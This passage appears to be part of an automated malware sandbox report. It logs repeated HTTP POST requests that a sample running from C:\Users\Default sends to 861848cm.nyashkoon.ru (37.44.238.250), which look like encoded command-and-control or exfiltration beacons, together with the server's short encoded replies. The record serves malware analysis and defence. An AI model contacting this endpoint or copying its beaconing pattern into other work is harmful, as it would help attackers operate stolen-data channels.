                                                                                            Nov 5, 2024 23:53:50.299886942 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            86192.168.2.45006137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:50.440196991 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:50.790321112 CET1024OUTData Raw: 56 54 5a 55 53 58 55 58 5a 5f 52 51 54 5f 5b 59 55 53 59 5a 51 55 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VTZUSXUXZ_RQT_[YUSYZQUR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]-,!? \()9.>)'8#/.V?>#[-C<47219'X$.Q-2
                                                                                            Nov 5, 2024 23:53:51.251265049 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:51.330646038 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            87192.168.2.45006437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:51.643795013 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:51.995826006 CET1024OUTData Raw: 56 51 5f 5f 56 56 55 58 5a 5f 52 51 54 52 5b 5a 55 56 59 59 51 52 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQ__VVUXZ_RQTR[ZUVYYQRR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/5<;4X?'>.=)3$Y ?P(/[:C$_7&%'X$.Q-
                                                                                            Nov 5, 2024 23:53:52.482317924 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:52.553010941 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            88192.168.2.45007337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:52.710714102 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:53.055493116 CET1024OUTData Raw: 53 53 5a 54 56 5f 55 5f 5a 5f 52 51 54 52 5b 5e 55 50 59 5d 51 52 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZTV_U_Z_RQTR[^UPY]QRR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_/.U<88<3 \*^=>*_38'4??:%' &Y2)'X$.Q-
                                                                                            Nov 5, 2024 23:53:53.524394989 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:53.601042032 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:51 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            89192.168.2.45007937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:53.949387074 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:54.305468082 CET1024OUTData Raw: 56 5f 5a 5a 56 5d 55 5d 5a 5f 52 51 54 59 5b 53 55 53 59 5c 51 55 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZZV]U]Z_RQTY[SUSY\QUR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/<5<($\<33*:6)'+<^ .?(,%8]#*&'X$.Q-*
                                                                                            Nov 5, 2024 23:53:54.751976967 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:54.825325012 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            90192.168.2.45008537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:54.952097893 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            91192.168.2.45008737.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:55.237788916 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1252
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:55.586916924 CET1252OUTData Raw: 56 52 5a 5b 56 58 50 5b 5a 5f 52 51 54 5a 5b 5e 55 5d 59 5d 51 5f 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZ[VXP[Z_RQTZ[^U]Y]Q_RXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%8/U+?0(*:?--0($X"?"W<.4.6;47"29'X$.Q-6
                                                                                            Nov 5, 2024 23:53:56.059844017 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:56.142760992 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 06 28 14 0f 07 33 3b 37 0d 28 3d 21 13 2b 30 09 5c 38 31 37 02 29 33 28 5d 29 06 3c 52 37 01 2f 15 22 32 31 5d 21 31 3c 00 2b 2b 21 5f 05 1d 39 5a 30 17 02 50 3d 0b 3a 59 3e 51 37 18 26 0e 09 1b 3e 02 2a 5d 23 04 3a 56 32 10 2e 00 26 22 23 52 3c 24 04 06 2d 06 33 1f 26 10 2a 57 09 16 23 0f 24 0a 3f 5b 2a 31 38 06 24 10 3d 58 24 29 33 56 29 3c 09 10 23 1d 22 14 2b 23 3f 13 23 27 3a 5b 24 3a 07 1c 25 2e 02 0a 3c 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #(3;7(=!+0\817)3(])<R7/"21]!1<++!_9Z0P=:Y>Q7&>*]#:V2.&"#R<$-3&*W#$?[*18$=X$)3V)<#"+#?#':[$:%.<"&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            92192.168.2.45009037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:55.360629082 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1012
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:55.711711884 CET1012OUTData Raw: 53 51 5f 5b 56 5f 55 5d 5a 5f 52 51 54 5a 5b 5a 55 53 59 5f 51 57 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SQ_[V_U]Z_RQTZ[ZUSY_QWR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&81<8]<$=)">.!0(7?)+-'4%29'X$.Q-
                                                                                            Nov 5, 2024 23:53:56.170129061 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:56.245335102 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            93192.168.2.45009637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:56.704581022 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:57.055506945 CET1016OUTData Raw: 56 52 5f 5f 56 57 55 59 5a 5f 52 51 54 5a 5b 5e 55 51 59 57 51 55 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VR__VWUYZ_RQTZ[^UQYWQUR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,?&W?8>3<X**5>$(<72+Z-&0!7X%'X$.Q-6
                                                                                            Nov 5, 2024 23:53:57.521550894 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:57.600121021 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:55 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            94192.168.2.45010137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:57.743838072 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:58.102458000 CET1024OUTData Raw: 56 5f 5f 59 53 5b 50 5a 5a 5f 52 51 54 58 5b 52 55 50 59 56 51 55 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V__YS[PZZ_RQTX[RUPYVQURXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]8?.T((0Y+3'=)!Z=[*]'^8 /-+.$:&,Y7=2'X$.Q-.
                                                                                            Nov 5, 2024 23:53:58.559920073 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:58.631181955 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            95192.168.2.45010237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:58.766155958 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:59.118102074 CET1024OUTData Raw: 53 54 5a 54 56 5f 50 53 5a 5f 52 51 54 5c 5b 5c 55 5c 59 5a 51 55 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZTV_PSZ_RQT\[\U\YZQUR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X-?5+??#8X)9)X*>=3<_#,:(#9+!71&'X$.Q->
                                                                                            Nov 5, 2024 23:53:59.608802080 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:59.681221962 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            96192.168.2.45010337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:59.812558889 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:00.164908886 CET1024OUTData Raw: 53 55 5a 5c 56 5a 55 5e 5a 5f 52 51 54 52 5b 59 55 50 59 5e 51 51 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ\VZU^Z_RQTR[YUPY^QQRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&-,2U+ X+#X))-0;< <-,:8Y#Q&&'X$.Q-
                                                                                            Nov 5, 2024 23:54:00.634643078 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:00.703541994 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            97192.168.2.45010437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:00.840018988 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            98192.168.2.45010537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:01.155915022 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:01.508769989 CET1264OUTData Raw: 56 5f 5a 5b 53 5f 50 58 5a 5f 52 51 54 5b 5b 52 55 5d 59 5f 51 53 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_Z[S_PXZ_RQT[[RU]Y_QSRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/?&V+4+X=).>="Z$+8_ ,9(?:%,Y72'X$.Q-"
                                                                                            Nov 5, 2024 23:54:01.971863031 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:02.043348074 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 15 3f 2a 21 07 27 3b 20 55 2a 07 39 1d 28 23 33 19 2d 32 02 59 29 0d 23 02 3e 01 3b 0a 23 2c 20 04 22 32 07 59 37 54 20 03 3f 11 21 5f 05 1d 39 12 33 39 3c 50 29 0b 31 06 3d 0e 23 18 27 20 34 09 3e 5d 32 5a 20 04 29 0c 26 58 32 03 26 22 37 16 2a 34 26 02 2e 11 02 0f 27 3a 2a 57 09 16 20 56 24 23 02 02 29 57 24 07 27 3e 1c 00 26 14 3f 56 2a 05 30 00 20 27 22 14 3e 33 38 02 23 37 3a 58 26 39 32 40 26 3d 33 51 29 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: ?*!'; U*9(#3-2Y)#>;#, "2Y7T ?!_939<P)1=#' 4>]2Z )&X2&"7*4&.':*W V$#)W$'>&?V*0 '">38#7:X&92@&=3Q)"&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            99192.168.2.45010637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:01.280555964 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:01.633902073 CET1024OUTData Raw: 56 51 5a 59 56 5b 55 58 5a 5f 52 51 54 5b 5b 5f 55 55 59 59 51 5f 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZYV[UXZ_RQT[[_UUYYQ_R\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;<5<^7+#4)91_>-$+;"<>Q?+Y,68\ =1'X$.Q-"
                                                                                            Nov 5, 2024 23:54:02.091809034 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:02.168530941 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            100192.168.2.45010737.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:02.305124998 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
